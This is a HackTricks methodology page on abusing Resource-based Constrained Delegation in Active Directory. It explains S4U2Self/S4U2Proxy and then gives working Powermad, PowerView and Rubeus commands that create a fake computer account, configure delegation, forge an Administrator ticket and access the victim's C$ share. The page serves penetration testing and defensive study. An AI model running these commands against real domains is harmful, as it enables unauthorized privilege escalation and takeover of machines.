coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
7df6e7df6d
hacktricks/windows/active-directory-methodology/resource-based-constrained-delegation.md

106 lines
5.3 KiB
Markdown
Raw Normal View History

GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
# Resource-based Constrained Delegation
## Basics of Resource-based Constrained Delegation
This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead** of giving permissions to an **object** to **impersonate any user against a service**. Resource-based Constrain Delegation **sets** in **the object who is able to impersonate any user against it**.
In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** \(_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_\) ****can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ \(In the other forms of Delegation you needed domain admin privs\).
### New Concepts
Back in Constrained Delegation it was told that the _**TrustedToAuthForDelegation**_ flag inside the _userAccountControl_ value of the user is needed to perform a **S4U2Self.** But that's not completely truth.
The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** \(have a SPN\) but, if you **have** _**TrustedToAuthForDelegation**_ the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work** \(this is not a vulnerability, it's a feature, apparently\).
### Attack structure
> If you have **write equivalent privileges** over a **Computer** account you can obtain **privileged access** in that machine.
Suppose that the attacker has already **write equivalent privileges over the victim computer**.
1. The attacker **compromises** an account that has a **SPN** or **creates one** \(“Service A”\). Note that **any** _Admin User_ without any other special privilege can **create** up ****until 10 **Computer objects \(**_**MachineAccountQuota**_**\)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
2. The attacker configures **resource-based constrained delegation from Service A to the victim host**.
3. The attacker uses Rubeus to perform a **full S4U attack** \(S4U2Self and S4U2Proxy\) from Service A to Service B for a user **with privileged access to Service B**.
1. S4U2Self \(from the SPN compromised/created account\): Ask for a **TGS of Administrator to me** \(Not Forwardable\).
2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**.
3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work.
4. The attacker can **pass-the-ticket** and **impersonate** the user to gain **access to the victim**.
To check the _**MachineAccountQuota**_ of the domain you can use:
```text
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
```
## Attack
### Creating a Computer Object
You can create a computer object inside the domain using [powermad](https://github.com/Kevin-Robertson/Powermad)**:**
```csharp
import-module powermad
New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
```
![](../../.gitbook/assets/b1.png)
```bash
Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
```
### Configuring R**esource-based Constrained Delegation**
```bash
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it work
```
![](../../.gitbook/assets/b2.png)
### Performing a complete S4U attack
First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
```bash
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER /domain:domain.local
```
This will print the RC4 and AES hashes for that account.
Now, the attack can be performed:
```bash
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
```
![](../../.gitbook/assets/b3.png)
### Accessing
The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.
In this example it was requested a TGS for the **CIFS** service from Administrator, so you will be able to access **C$**:
```bash
ls \\victim.domain.local\C$
```
![](../../.gitbook/assets/b4.png)
## References
{% embed url="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" %}
{% embed url="https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/" %}
{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution\#modifying-target-computers-ad-object" %}
{% embed url="https://blog.stealthbits.com/resource-based-constrained-delegation-abuse/" %}
Reference in New Issue Copy Permalink